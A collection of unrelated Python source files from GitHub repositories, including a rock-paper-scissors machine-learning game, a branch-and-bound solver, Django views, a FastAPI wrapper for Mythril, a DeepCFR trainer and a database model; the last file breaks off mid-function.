from sklearn.tree import DecisionTreeClassifier, export_graphviz
from sklearn.externals.six import StringIO
import numpy as np
import random
import json
# Takes a dictionary of players as keys and weapons as values
# Returns the key of the winning player
def winner(game):
winning_definitions = {frozenset(['paper', 'rock']): 'paper',
frozenset(['rock', 'scissors']): 'rock',
frozenset(['scissors', 'paper']): 'scissors',}
winning_weapon = winning_definitions.get(frozenset([game['Human'], game['Computer']]), 'draw')
for player, weapon in game.items():
if winning_weapon == 'draw':
return 'draw'
elif winning_weapon == weapon:
return player.lower()
# Returns the choice entered at the command line
def human_choice():
valid_options = frozenset(['rock', 'paper', 'scissors'])
while True:
user_input = raw_input('Please enter your choice: rock, paper, scissors: ').lower().strip()
if user_input in valid_options:
return user_input
else:
print('Entry not valid.')
# Returns a random weapon
def random_choice():
print('playing random')
return random.choice(['rock', 'paper', 'scissors'])
# Returns weapon based on http://www.businessinsider.com/how-to-beat-anyone-at-rock-paper-scissors-2014-5
def wang_choice(last_game):
human_won = {'rock': 'paper', 'paper': 'scissors', 'scissors': 'rock'}
human_lost = {'rock': 'scissors', 'paper': 'rock', 'scissors': 'paper'}
if last_game['Champion'] == 'human':
return human_won[last_game['Human']]
else:
return human_lost.get(last_game['Human'], random_choice())
# Returns choice based on decision tree
def tree_choice(last_game):
offensive_definitions = {'rock': 'paper', 'paper': 'scissors', 'scissors': 'rock'}
for value in last_game.values():
if value == None:
null_found = True
break
else:
null_found = False
if null_found:
print('found null - playing wang')
return wang_choice(last_game)
else:
print('playing tree')
weapons_encoder = preprocessing.LabelEncoder()
weapons_encoder.fit(['paper', 'rock', 'scissors'])
champion_encoder = preprocessing.LabelEncoder()
champion_encoder.fit(['computer', 'human', 'draw'])
samples = []
labels = []
#get data
with open('data', 'r') as f:
for line in f.readlines():
# preprocess data
game = json.loads(line)
del game['Game']
del game['Computer']
del game['Champion']
human_older = weapons_encoder.transform([game['Human_Older']])
computer_older = weapons_encoder.transform([game['Computer_Older']])
champion_older = champion_encoder.transform([game['Champion_Older']])
sample = human_older + computer_older + champion_older
samples.append(sample)
labels.append(weapons_encoder.transform([game['Human']]))
# train the model with the data
tree = DecisionTreeClassifier()
tree = tree.fit(samples, labels)
# print tree
with open('tree.dot', 'w') as f:
f = export_graphviz(tree, out_file=f)
# predict and return the next choice
human = weapons_encoder.transform(last_game['Human'])
computer = weapons_encoder.transform(last_game['Computer'])
champion = champion_encoder.transform(last_game['Champion'])
test_data = [human + computer + champion]
test_data = np.array(test_data).reshape(1, -1)
prediction = tree.predict(test_data, labels)
prediction = weapons_encoder.inverse_transform(prediction)
return offensive_definitions[prediction[0]]
# Returns game selection
def game_type():
valid_options = frozenset(['random', 'wang', 'tree'])
while True:
user_input = raw_input('Please enter your choice of game: Random, Wang, or Tree: ').lower().strip()
if user_input in valid_options:
return user_input
else:
print('Entry not valid.')
# Create and store a new data record
def process_results(game, last_game):
# create a new last_game
last_game['Game_Older'] = last_game['Game']
last_game['Game'] = game['Game']
last_game['Computer_Older'] = last_game['Computer']
last_game['Computer'] = game['Computer']
last_game['Human_Older'] = last_game['Human']
last_game['Human'] = game['Human']
last_game['Champion_Older'] = last_game['Champion']
last_game['Champion'] = game['Champion']
# store the new last_game
for value in last_game.values():
if value == None:
save = False
break
else:
save = True
if save:
with open('data', 'a') as f:
f.write(json.dumps(last_game) + '\n')
#return the new last_game
return last_game
# Runs the main program
def main():
# Initialize the game
total_games = 0
human_wins = 0
last_game = {'Game': None, 'Computer': None, 'Human': None, 'Champion': None,
'Game_Older': None, 'Computer_Older': None, 'Human_Older': None, 'Champion_Older': None}
# Play the game
g_t = game_type()
more = True
while more:
print('\nOld last_game: ', end='')
print(last_game)
if g_t == 'random':
game = {'Game': 'random'}
game['Computer'] = random_choice()
elif g_t == 'wang':
game = {'Game': 'wang'}
game['Computer'] = wang_choice(last_game)
elif g_t == 'tree':
game = {'Game': 'tree'}
game['Computer'] = tree_choice(last_game)
else:
print('Game Type Error - Tell Daniel')
break
game['Human'] = human_choice()
game['Champion'] = winner(game)
print('Current game: ', end='')
print(game)
# Process the data and create a new last game
last_game = process_results(game, last_game)
print('New last_game: ', end='')
print(last_game)
# Report on the game
if game['Champion'] != 'draw':
total_games += 1
if game['Champion'] == 'human':
human_wins += 1
print('\n' + game['Champion'] + ' wins!')
print('Human Win Rate: {0:.0f}%'.format(human_wins/total_games * 100))
print('Total Game: ', end='')
print(total_games)
else:
print('\nDraw')
# Ask if humans want to go again
if raw_input('\nContinue? n = no, anything else = yes: ') == 'n':
more = False
if __name__ == '__main__':
main() | daniel-lovell/Paper-Rock-Scissors | rps.py | rps.py | py | 6,914 | python | en | code | 0 | github-code | 50 |
70551213276 | from Simplex import *
class BranchAndBound:
def __init__(self, a, b, c, minimize=True):
# self.BaseA = a
# self.BaseB = b
self.A = a
self.B = b
self.C = c
self.Minimize = minimize
self.Solutions = []
self.Values = []
self.Nodes = []
self.Count = 0
def find_float(self, solution):
for i in range(len(solution)):
if solution[i] != 0 and solution[i] % 1 != 0:
return i
return len(solution)
def calculate(self, a, b):
simp = Simplex(a, b, self.C, self.Minimize)
simp.calculate()
simp.print_info()
if not simp.solution_exists():
print('\nSOLUTION DOES NOT EXIST\n')
return
if len(self.Values) != 0 and ((self.Minimize and simp.find_func_value() > min(self.Values)) or
(not self.Minimize and simp.find_func_value() < max(self.Values))):
print(f'Value {simp.find_func_value()} '
f'{"is more than minimal" if self.Minimize else "is less than maximal"} {max(self.Values)}\n')
return
k = self.find_float(simp.Solution)
try:
if k == len(simp.Solution):
if len(self.Values) == 0 or (self.Minimize and simp.find_func_value() < min(self.Values)) or \
(not self.Minimize and simp.find_func_value() > max(self.Values)):
self.Values.append(simp.find_func_value())
self.Solutions.append(simp.Solution)
print(f'Solutions: {self.Solutions}')
print(f'Values: {self.Values}')
print(f'Minimal: {min(self.Values)}') if self.Minimize else print(f'Maximal: {max(self.Values)}')
print(f'Nodes: {self.Nodes}\n')
return
except:
return
self.Count += 1
print(f'{self.Count} LEVEL\n')
node = round(simp.Solution[k], 2)
print(f'Branching by {node} on x <= {node // 1} and x >= {node // 1 + 1}\n')
self.Nodes.append(node)
print(f'Add x{k+1} <= {node // 1}\n')
new_lhs = np.zeros(self.A.shape[1])
new_lhs[k] = 1 if not self.Minimize else -1
self.calculate(a=np.vstack([self.A, new_lhs]), b=np.append(self.B, node//1 if not self.Minimize else -node//1))
print(f'Add x{k + 1} >= {node // 1 + 1}\n')
new_lhs = np.zeros(self.A.shape[1])
new_lhs[k] = -1 if not self.Minimize else 1
self.calculate(a=np.vstack([self.A, new_lhs]), b=np.append(self.B,
-(node//1+1) if not self.Minimize else node//1+1))
| TheMatrix2/OptimizationMethods | Branch&BoundMethod/BranchAndBound.py | BranchAndBound.py | py | 2,746 | python | en | code | 0 | github-code | 50 |
8141213629 | import sqlite3
from django.shortcuts import render, redirect, reverse
from django.contrib.auth.decorators import login_required
from capstoneapp.models import Business, BusinessType, Customer
from .business_details import get_business
def get_business_types():
return BusinessType.objects.all()
@login_required
def business_form(request):
if request.method == 'GET':
# """GETS a list of all business types to populate the dropdown in the add business form."""
business_types = get_business_types()
template = 'businesses/business_form.html'
context = {
'all_business_types': business_types
}
return render(request, template, context)
@login_required
def business_edit_form(request, business_id):
if request.method == 'GET':
# """GETS the details of a specific business to pre-fill the business edit form."""
business = get_business(business_id)
business_types = get_business_types
template = 'businesses/business_form.html'
context = {
'business': business,
'all_business_types': business_types
}
return render(request, template, context)
| castlesmadeofcode/Stay-Safr | capstoneapp/views/businesses/business_form.py | business_form.py | py | 1,202 | python | en | code | 0 | github-code | 50 |
19594321641 | import re
from gringotts.middleware import base
UUID_RE = r"([0-9a-f]{32}|[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})"
API_VERSION = r"(v1|v2)"
RESOURCE_RE = r"(images)"
class GlanceBillingProtocol(base.BillingProtocol):
def __init__(self, app, conf):
super(GlanceBillingProtocol, self).__init__(app, conf)
self.resource_regex = re.compile(
r"^/%s/%s/%s([.][^.]+)?$" % (API_VERSION, RESOURCE_RE, UUID_RE), re.UNICODE)
self.create_resource_regex = re.compile(
r"^/%s/%s([.][^.]+)?$" % (API_VERSION, RESOURCE_RE), re.UNICODE)
self.position = 2
self.resource_regexs = [
self.resource_regex,
]
def filter_factory(global_conf, **local_conf):
conf = global_conf.copy()
conf.update(local_conf)
def bill_filter(app):
return GlanceBillingProtocol(app, conf)
return bill_filter
| gbraad/ustack-gringotts | gringotts/middleware/glance.py | glance.py | py | 906 | python | en | code | null | github-code | 50 |
17313809663 | from fastapi import FastAPI
from mythril_script import *
import json
app = FastAPI()
@app.get('/')
def default():
return "Server is running! The API is ready"
@app.get("/output/{contract_name}")
async def show(contract_name: str):
analyze_mythril(contract_name)
file_json = contract_name.replace(".sol", ".json")
path_json_final = "./json/"+file_json
json_file = open(path_json_final, 'r')
json_data = json_file.read()
obj=json.loads(json_data)
print(str(obj['issues'])) | NavyanshMahlaMarsh/mythril-api | mythril_api.py | mythril_api.py | py | 507 | python | en | code | 0 | github-code | 50 |
41099265715 | ###########################################
# Book "Python Crash course" - Eric Matthes
# Chapter 8: Functions
###########################################
###########################################
# print a greeting
# the str() is needed if someones's name is a number
def greeting(name):
""" simple greeting """
print ("Hi, "+ str(name).title())
print ("Hi, "+ str(name.title()))
print ("Hi, "+ name.title())
greeting ("andi")
###########################################
# keyword arguments, default values
def pets (pet_name, pet_type = "dog"):
""" returns pet name and type """
print (pet_name.title() + " is my " + pet_type + ".")
pets ("Barko")
pets ("Hops", "hamster")
pets (pet_type = "hamster", pet_name = "Hops" )
###########################################
# return value
def calculate(a):
""" calcualtion function """
b = a
c = a * a
return b,c
print (calculate(5))
| aschiedermeier/Python_Crash_course | 8_1_Functions.py | 8_1_Functions.py | py | 935 | python | en | code | 0 | github-code | 50 |
8339732859 | """Sengled Bulb Integration."""
import asyncio
import logging
_LOGGER = logging.getLogger(__name__)
class Switch:
def __init__(
self,
api,
device_mac,
friendly_name,
state,
device_model,
accesstoken,
country,
):
_LOGGER.debug("SengledApi: Switch " + friendly_name + " initializing.")
self._api = api
self._device_mac = device_mac
self._friendly_name = friendly_name
self._state = state
self._avaliable = True
self._just_changed_state = False
self._device_model = device_model
self._accesstoken = accesstoken
self._country = country
async def async_turn_on(self):
_LOGGER.debug("Switch " + self._friendly_name + " turning on.")
url = (
"https://"
+ self._country
+ "-elements.cloud.sengled.com/zigbee/device/deviceSetOnOff.json"
)
payload = {"deviceUuid": self._device_mac, "onoff": "1"}
loop = asyncio.get_running_loop()
loop.create_task(self._api.async_do_request(url, payload, self._accesstoken))
self._state = True
self._just_changed_state = True
async def async_turn_off(self):
_LOGGER.debug("Switch " + self._friendly_name + " turning off.")
url = (
"https://"
+ self._country
+ "-elements.cloud.sengled.com/zigbee/device/deviceSetOnOff.json"
)
payload = {"deviceUuid": self._device_mac, "onoff": "0"}
loop = asyncio.get_running_loop()
loop.create_task(self._api.async_do_request(url, payload, self._accesstoken))
self._state = False
self._just_changed_state = True
def is_on(self):
return self._state
async def async_update(self):
_LOGGER.debug("Switch " + self._friendly_name + " updating.")
if self._just_changed_state:
self._just_changed_state = False
else:
url = (
"https://element.cloud.sengled.com/zigbee/device/getDeviceDetails.json"
)
payload = {}
data = await self._api.async_do_request(url, payload, self._accesstoken)
_LOGGER.debug("Switch " + self._friendly_name + " updating.")
for item in data["deviceInfos"]:
for items in item["lampInfos"]:
self._friendly_name = items["attributes"]["name"]
self._state = (
True if int(items["attributes"]["onoff"]) == 1 else False
)
self._avaliable = (
False if int(items["attributes"]["isOnline"]) == 0 else True
)
| jfarmer08/ha-sengledapi | custom_components/sengledapi/sengledapi/devices/switch.py | switch.py | py | 2,753 | python | en | code | 97 | github-code | 50 |
30755941328 | from category import Category
from customer import Customer
from email import Email
from phone import Phone
from goods import Goods
from base import Base
from order import Order
from base import Base, Session, engine
import psycopg2
import query_parser
def iterator(mes):
for i in range(10):
mes += "chr(trunc(65+random()*25)::int) || "
return mes
class Model:
# ========== ctor ==========
def __init__(self):
Base.metadata.create_all(engine)
self.session = Session()
self.conn = psycopg2.connect("dbname='shop' user='postgres' host='localhost' password='3497279088'")
self.curs = self.conn.cursor()
# ========== Goods table ==========
def read_goods_by_pk(self, goods_pk):
return self.session.query(Goods).filter(Goods.goods_id == goods_pk).one()
def insert_goods(self, goods):
self.session.add(Goods(goods[0], goods[1], goods[2], goods[3], goods[4], self.session.query(Category)
.filter(Category.category_id == goods[4]).one()))
self.session.commit()
def update_goods(self, goods):
self.session.query(Goods).filter(Goods.goods_id == goods[0]) \
.update({'name': goods[1], 'price': goods[2], 'discount': goods[3], 'guarantee': goods[4],
'category_id': goods[5]})
self.session.commit()
def delete_goods(self, goods_start_id, goods_end_id):
self.session.query(Goods).filter(Goods.goods_id >= goods_start_id).filter(Goods.goods_id <= goods_end_id)\
.delete()
self.session.commit()
def generate_goods(self, goods_counter):
message = "SELECT "
for i in range(2):
message = iterator(message)
message += 'chr(trunc(65+random()*25)::int), trunc(10000+random()*999999)::int, random()*30, 24, ' \
'(SELECT category_id FROM "Category" order by random() limit 1) from generate_series(1, {})' \
.format(goods_counter)
self.curs.execute('INSERT INTO "Goods" (name, price, discount, guarantee, category_id) {}'.format(message))
self.conn.commit()
# ========== Customers table ==========
def read_customer_by_pk(self, customer_pk):
return self.session.query(Customer).filter(Customer.customer_id == customer_pk).one()
def insert_customer(self, customer):
self.session.add(Customer(customer[0], customer[1], customer[2], customer[3]))
self.session.commit()
def update_customer(self, customer):
self.session.query(Customer).filter(Customer.customer_id == customer[0]) \
.update({'surname': customer[1], 'name': customer[2], 'father_name': customer[3], 'favourites': customer[4]})
self.session.commit()
def delete_customer(self, customer_start_id, customer_end_id):
self.session.query(Customer).filter(Customer.customer_id >= customer_start_id) \
.filter(Customer.customer_id <= customer_end_id).delete()
self.session.commit()
def generate_customers(self, customers_number):
message = "SELECT "
message = iterator(message)
message += "chr(trunc(65+random()*25)::int) as surname, "
message = iterator(message)
message += "chr(trunc(65+random()*25)::int) as name, "
message = iterator(message)
message += "chr(trunc(65+random()*25)::int) as father_name "
self.curs.execute('INSERT INTO "Customer" (surname, name, father_name, favourites) {},'
'random_favourites() from generate_series(1, {})'
.format(message, customers_number))
self.conn.commit()
# ========== Phone table ==========
def read_phone_by_pk(self, phone_pk):
return self.session.query(Phone).filter(Phone.phone == phone_pk).one()
def insert_phone(self, phone):
self.session.add(Phone(phone[0], phone[1], self.session.query(Customer)
.filter(Customer.customer_id == phone[1]).one()))
self.session.commit()
def update_phone(self, phone):
self.session.query(Phone).filter(Phone.phone == phone[0]) \
.update({'phone': phone[1], 'customer_id': phone[2]})
self.session.commit()
def delete_phone(self, phone):
self.session.query(Phone).filter(Phone.phone.ilike(phone)).delete()
self.session.commit()
def generate_phone(self, phone_counter):
self.curs.execute('INSERT INTO "Phone" SELECT ' + "'+'" + ' || text(trunc(100000000+random()*999999999)::int), '
'(SELECT customer_id FROM "Customer" order by random() limit 1) FROM generate_series(1, {})'.
format(phone_counter))
self.conn.commit()
# ========== Email table ==========
def read_email_by_pk(self, email_pk):
return self.session.query(Email).filter(Email.email == email_pk).one()
def insert_email(self, email):
self.session.add(Email(email[0], email[1], self.session.query(Customer)
.filter(Customer.customer_id == email[1]).one()))
self.session.commit()
def update_email(self, email):
self.session.query(Email).filter(Email.email == email[0]) \
.update({'email': email[1], 'customer_id': email[2]})
self.session.commit()
def delete_email(self, email):
self.session.query(Email).filter(Email.email == email).delete()
self.session.commit()
def generate_emails(self, emails_counter):
message = "SELECT "
for i in range(2):
message = iterator(message)
message += "'@gmail.com'"
self.curs.execute('INSERT INTO "Email" {}, (SELECT customer_id FROM "Customer" '
'order by random() limit 1) FROM generate_series(1, {})'.
format(message, emails_counter))
self.conn.commit()
# ========== Category table ==========
def read_category_by_pk(self, category_pk):
return self.session.query(Category).filter(Category.category_id == category_pk).one()
def insert_category(self, category):
if category[1] != '':
self.session.add(Category(category[0], category[1]))
else:
self.session.add(Category(category[0]))
self.session.commit()
def update_category(self, category):
self.session.query(Category).filter(Category.category_id == category[0]) \
.update({'name': category[1], 'parent_category_id': category[2]})
self.session.commit()
def delete_category(self, category_start_id, category_end_id):
self.session.query(Category).filter(Category.category_id >= category_start_id) \
.filter(Category.category_id <= category_end_id).delete()
self.session.commit()
def generate_categories(self, categories_counter):
message = "SELECT "
for i in range(2):
message = iterator(message)
message += "chr(trunc(65+random()*25)::int), null"
self.curs.execute('INSERT INTO "Category" (name, parent_category_id) {} FROM generate_series(1, {})'
.format(message, categories_counter))
self.conn.commit()
# ========== Order table ==========
def read_order_by_pk(self, order_pk):
return self.session.query(Order).filter(Order.order_id == order_pk).one()
def insert_order(self, order):
self.session.add(Order(order[0], order[1], order[2], order[3], self.session.query(Goods)
.filter(Goods.goods_id == order[1]).one(), self.session.query(Customer)
.filter(Customer.customer_id == order[2]).one()))
self.session.commit()
def update_order(self, order):
self.session.query(Order).filter(Order.order_id == order[0]) \
.update({'date': order[1], 'goods_id': order[2], 'customer_id': order[3], 'confirming_method': order[4]})
self.session.commit()
def delete_order(self, order_start_id, order_end_id):
self.session.query(Order).filter(Order.order_id >= order_start_id).filter(Order.order_id <= order_end_id)\
.delete()
self.session.commit()
def generate_orders(self, orders_number):
message = "SELECT timestamp '2008-01-10 20:00:00' + " \
"random() * (timestamp '2020-12-31 23:00:00' - timestamp '2008-01-10 20:00:00'), " \
'(SELECT goods_id FROM "Goods" order by random() limit 1), ' \
'(SELECT customer_id FROM "Customer" order by random() limit 1), ' + "'phone'"
self.curs.execute('INSERT INTO "Order" '
'(date, goods_id, customer_id, confirming_method) {} from generate_series(1, {})'
.format(message, orders_number))
self.conn.commit()
# ========== Find ==========
def find_entities(self, query):
pass
try:
message = "SELECT * FROM \"{}\" WHERE ".format(query[0])
message += query_parser.QueryParser.parse_query(query)
message = message.rstrip("and ")
self.curs.execute(message)
return self.curs.fetchall()
except Exception as ex:
raise ex
finally:
self.conn.rollback()
| filenkoB/databases | lab3/model.py | model.py | py | 9,396 | python | en | code | 0 | github-code | 50 |
2354781570 | from Compilador.Entorno import entorno
from Compilador.Entorno.simbolo import Simbolo
from Compilador.Expresiones.llamada_funcion_exp import Llamada_funcion_exp
from Compilador.Interfaces.nodo import Nodo
from Compilador import generador
from Compilador.TablaSimbolo.tipo import tipo
class Declaracion(Nodo):
def __init__(self,token, idnodo, tipo, valor, listaid, esMutable, fila, columna):
super().__init__(token,idnodo)
self.listaid = listaid
self.valor = valor
self.tipo = tipo
self.esMutable = esMutable
self.fila = fila
self.columna = columna
self.tipoSimbolo = "variable"
#print("Tipo (declaracion): ",self.tipo.tipo_string)
def crearTabla(self,ts):
for id in self.listaid:
self.valor.crearTabla(ts)
if self.tipo is None:
print("--",self.valor.tipo)
self.tipo = self.valor.tipo
print(id)
print(self.tipo.tipo_enum)
if self.tipo.tipo_enum == tipo.I64 or self.tipo.tipo_enum == tipo.F64 or self.tipo.tipo_enum == tipo.STR \
or self.tipo.tipo_enum == tipo.STRING or self.tipo.tipo_enum == tipo.CHAR or self.tipo.tipo_enum == tipo.BOOL:
nuevoSimbolo = Simbolo(id, self.tipo,self.tipoSimbolo,1, ts.nombre, ts.getUltimaPosStack(),self.valor.posHeap,self.fila,self.columna)
ts.put(id, nuevoSimbolo)
entorno.tabla_simbolos_global.append(nuevoSimbolo)
entorno.desplazamiento += 1 #<---Verificar si esta variable se está usando xd
def crearCodigo3d(self,ts):
self.expresion += "//Realizando declaracion"+"\n"
tempValor = generador.nuevoTemporal()
self.expresion += self.valor.crearCodigo3d(ts)
for id in self.listaid:
if self.tipo.tipo_enum == tipo.I64 or self.tipo.tipo_enum == tipo.F64 or self.tipo.tipo_enum == tipo.STR\
or self.tipo.tipo_enum == tipo.STRING or self.tipo.tipo_enum == tipo.CHAR:
self.expresion += tempValor + " = " + str(self.valor.ref)+";\n"
elif self.tipo.tipo_enum == tipo.BOOL:
#print("-",self.valor.exp1)
print(self.valor.ref)
etiSalida = [generador.nuevaEtiqueta()]
if isinstance(self.valor,Llamada_funcion_exp):
self.expresion += tempValor + " = " + self.valor.ref + ";\n"
else:
self.expresion += generador.soltarEtiqueta(self.valor.etiV)
self.expresion += tempValor + " = 1;\n"
self.expresion += generador.generarGoto(etiSalida[0])
self.expresion += generador.soltarEtiqueta(self.valor.etiF)
self.expresion += tempValor + " = 0;\n"
self.expresion += generador.soltarEtiqueta(etiSalida)
#Se genera el temporal y la posicion del stack donde se guardara la varible
tempPosVariable = generador.nuevoTemporal()
#print(id)
self.expresion += tempPosVariable + " = P + "+str(ts.get(id).direccionRel)+";\n"
self.expresion += "stack[(int)"+tempPosVariable+"] = " + tempValor+";\n"
return self.expresion
def calcTam(self):
if self.tipo.tipo_enum != tipo.VEC or self.tipo.tipo_enum != tipo.ERROR:
return 1
return 0 | JASAdrian1/OLC2_Proyecto2_201901704 | Compilador/Instrucciones/declaracion.py | declaracion.py | py | 3,415 | python | es | code | 0 | github-code | 50 |
21670622468 | """Some things never change."""
import typer
from ee_cli.settings import Settings
settings = Settings()
EXIT_HOTWORDS = {"end", "exit", "done", "quit", "q"}
RESET_HOTWORDS = {"clear", "restart", "c"}
DROP_HOTWORDS = {"drop", "remove", "rm", "d"}
TOGGLE_INDEX_HOTWORDS = {"index", "idx", "indexes", "i"}
HELP_HOTWORDS = {"help", "h", "?"}
SHOW_CONFIG_HOTWORDS = {"config", "settings", "env"}
GO_BACK_HOTWORDS = {"back"}
COPY_HOTWORDS = {"copy", "yy", "cp"}
PENDULUM_SEMANTIC_ATTRS = {"tomorrow", "today", "yesterday"}
COULD_NOT_PARSE_ERROR_MESSAGE = "Couldn't parse: {date}. Try again?."
NO_TIMES_YET_MESSAGE = "Transformations added to the list as you type them"
HELP_HEADER = typer.style(
"\n Type the word 'back' to leave this screen\n\n", typer.colors.BRIGHT_MAGENTA
)
HOTWORDS_HELP = f"""
To exit the repl use: {typer.style(str(EXIT_HOTWORDS), typer.colors.RED)}.
[ctrl + d] and [ctrl + c] also work.
To remove the last item from the list use: {typer.style(str(DROP_HOTWORDS), typer.colors.RED)}.
To remove arbitrary items, include the 0-based index of the item.
i.e. `drop 3` will drop the 4th item shown on screen.
To send all your conversions to the clipboard, use {typer.style(str(COPY_HOTWORDS), typer.colors.RED)}.
This will exit the repl.
To clear the list use: {typer.style(str(RESET_HOTWORDS), typer.colors.RED)}.
To inspect your configuration (env vars) use: {typer.style(str(SHOW_CONFIG_HOTWORDS), typer.colors.RED)}.
To see this help in the repl use: {typer.style(str(HELP_HOTWORDS), typer.colors.RED)}.
""" # the space is intentional
CONFIGURATION_INFO = (
"\n".join(
f"{settings.Config.env_prefix}{k.upper()}: {v}"
for k, v in settings.dict(by_alias=True).items()
)
+ "\n "
)
MAYBE_TZ_HEADS_UP = typer.style(
f"(tz={settings.default_timezone})" if settings.show_tz_heads_up else "",
typer.colors.BRIGHT_YELLOW,
)
DEFAULT_DATETIME_INPUT_FORMATS = (
"MM-DD-YY",
"MMM DD YYYY",
"MMM D YYYY",
"MMM D YY",
"MMM DD YY",
)
| ainsleymcgrath/epoch-echo | ee_cli/constants.py | constants.py | py | 2,012 | python | en | code | 2 | github-code | 50 |
74343895835 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
#author: Jiang Liu<jiang.liu@yottaa.com>
#date: 2014-3-27
try:
import json
except ImportError:
import simplejson as json
import os,commands
from zabbix_socket_sender import Zabbix
data = {}
def dns_health():
status = commands.getstatusoutput('dig +time=3 +tries=3 +noall +answer @127.0.0.1 system.topology.tpu.yottaa.net >/dev/null 2>&1')
data['dns_health'] = int(status[0])
return data
def push_data():
host = os.popen("cat /etc/company.facts |grep publicip |awk '{print $3}'").read().strip()
TMUdata = dns_health()
hostvalues = {host:TMUdata}
Zabbix(hostvalues).run()
if __name__ == "__main__":
push_data() | canshen-yottaa/shencan | ansible/zabbix/roles/install/files/zabbix_tmu.py | zabbix_tmu.py | py | 703 | python | en | code | 0 | github-code | 50 |
11272726020 | import torch
import random
from agents.RandomAgent import RandomAgent
from agents.DeepCFR.DeepCFRAgent import DeepCFRAgent
from agents.DeepCFR.StrategyMemory import StrategyMemory
from copy import deepcopy
from statistics import mean
"""
Two randomization techniques we are using for avoiding local minima are:
1) Restart the DeepCFR Advantage Networks from scratch after some iterations
2) Pertubation in strategies which favours a single action. This could improve some exploration.
"""
"""
Things to notice:
1) DeepCFR is quite sensitive to initializations!
"""
class CFRRunner(object):
def __init__(
self,
payoff_matrix,
num_iterations,
K=100,
num_runs=1000,
advantage_batch_size=32,
policy_batch_size=32,
advantage_memory_size=20000,
strategy_memory_size=20000,
):
self.payoff_matrix = payoff_matrix
self.player_list = [0, 1]
self.advantage_memory_size = advantage_memory_size
self.strategy_memory_size = strategy_memory_size
self.agents = [
DeepCFRAgent(0, advantage_memory_size),
DeepCFRAgent(1, advantage_memory_size),
]
self.num_iterations = num_iterations
self.K = K
self.strategy_memory = StrategyMemory(
self.player_list, self.strategy_memory_size
)
self.advantage_batch_size = advantage_batch_size
self.policy_batch_size = policy_batch_size
self.num_runs = num_runs
def run(self):
for i in range(self.num_runs):
if i % 100 == 0:
self.set_advantage_weights_zero()
self.DeepCFR(i * self.num_iterations)
print()
print("Game Strength: {}".format(self.evaluate()))
print()
def DeepCFR(self, start_iter):
"""
Initialize each player's advantage network, such that it returns 0 for all outputs.
Initialize reservoir sampled memories for advantages and a strategy memory.
"""
for iteration in range(self.num_iterations):
"""
For training from scratch in each iteration
"""
for agent in self.agents:
agent.deal_card()
for player in self.player_list:
for traversal in range(self.K):
self.TRAVERSE(
[], self.strategy_memory, (iteration + 1 + start_iter), player
)
self.agents[player].sample_advantage_and_train(
self.advantage_batch_size
)
"""
Train for policy network of each agent to converge to the strategy.
"""
for policy_iteration in range(100):
for player in self.player_list:
data = self.strategy_memory.sample(player, self.policy_batch_size)
self.agents[player].train_policy_net(data, self.policy_batch_size)
if policy_iteration % 10 == 0:
print(
"Partial Game Strength in iteration {}: {}".format(
policy_iteration, self.evaluate()
)
)
def TRAVERSE(self, history, strategy_memory, t, p):
"""
if h is terminal then return the payoff to player p
"""
if len(history) == 2:
player1 = history[0]["action"] + torch.Tensor([3 * self.agents[0].card])
player2 = history[1]["action"] + torch.Tensor([3 * self.agents[1].card])
return_val = self.payoff_matrix[int(player1)][int(player2)]
return return_val
"""
if h is a chance node, then sample an action from the probabilities. But in our two player matrix game, there is no chance node, so we do not need to cansider them!
"""
"""
if P(h) = p, then compute strategy from predicted advantages using regret matching
"""
if len(history) == p:
"""
Compute strategy, from advantage network
"""
I = self.agents[p].get_infoset(history)
advantage_values = self.agents[p].compute_advantage(I)
advantage_values = torch.clamp(advantage_values, min=0)
strategy = (
advantage_values / advantage_values.sum()
if advantage_values.sum() > 0.000001
else torch.full_like(advantage_values, 1 / advantage_values.shape[0])
)
v = torch.zeros(3)
expected_v = 0
for action in [0, 1, 2]:
pseudo_history = deepcopy(history)
pseudo_history.append({"action": action})
v[action] = self.TRAVERSE(pseudo_history, strategy_memory, t, p)
with torch.no_grad():
expected_v += strategy[action] * v[action]
"""
Compute Advantages
"""
regrets = torch.zeros(3)
for action in [0, 1, 2]:
regrets[action] = v[action] - expected_v
"""
Insert the infoset and action advantages into the advantage memory
"""
buffer_object = {"infoset": I, "t": t, "regrets": regrets}
self.agents[p].advantage_memory.add_memory_object(buffer_object)
else:
I = self.agents[1 - p].get_infoset(history)
advantage_values = self.agents[1 - p].compute_advantage(I)
advantage_values = torch.clamp(advantage_values, min=0)
strategy = (
advantage_values / advantage_values.sum()
if advantage_values.sum() > 0.000001
else torch.full_like(advantage_values, 1 / advantage_values.shape[0])
)
"""
Insert infoset and action probabilities into strategy memory.
"""
strategy_memory_object = {"infoset": I, "t": t, "strategy": strategy}
self.strategy_memory.insert_element(1 - p, strategy_memory_object)
"""
Sample an action a from probability distribution of the strategy
"""
action = random.choices([0, 1, 2], weights=strategy, k=1)[0]
history.append({"action": action})
return self.TRAVERSE(history, strategy_memory, t, p)
def evaluate(self):
rewards = []
for _ in range(1000):
history = []
for agent in self.agents:
agent.deal_card()
move = agent.act_policy(history)
history.append(
{
"action": move,
}
)
player1 = history[0]["action"] + 3 * self.agents[0].card
player2 = history[1]["action"] + 3 * self.agents[1].card
episode_reward = self.payoff_matrix[int(player1)][int(player2)]
rewards.append(episode_reward)
return mean(rewards)
def add_strategy_pertubation1(self, strategy):
index = (strategy == 1).nonzero()
if index.shape[0] == 0:
return strategy
assert index.shape == (1, 1)
index = index.item()
torch.fill_(strategy, 0.15 / strategy.shape[0])
strategy[index] += 0.85
return strategy
def add_strategy_pertubation2(self, strategy):
strategy += 0.2
return strategy / strategy.sum()
def set_advantage_weights_zero(self):
for agent in self.agents:
agent.advantage_net.init_weights()
| prateekstark/matrix-game | CFRRunner.py | CFRRunner.py | py | 7,595 | python | en | code | 0 | github-code | 50 |
15830134815 | import mock
import six
from tvrenamer.core import formatter
from tvrenamer.tests import base
class FormatterTest(base.BaseTest):
def test_replace_series_name(self):
self.CONF.set_override('input_series_replacements', dict())
name = 'Reign'
self.assertEqual(
formatter._replace_series_name(
name, self.CONF.input_series_replacements),
'Reign')
self.CONF.set_override('input_series_replacements',
{'reign (2013)': 'reign'})
name = 'Reign'
self.assertEqual(
formatter._replace_series_name(
name, self.CONF.input_series_replacements),
'Reign')
self.CONF.set_override('input_series_replacements',
{'reign': 'reign (2013)'})
name = 'Reign'
self.assertEqual(
formatter._replace_series_name(
name, self.CONF.input_series_replacements),
'reign (2013)')
def test_clean_series_name(self):
self.CONF.set_override('input_series_replacements', dict())
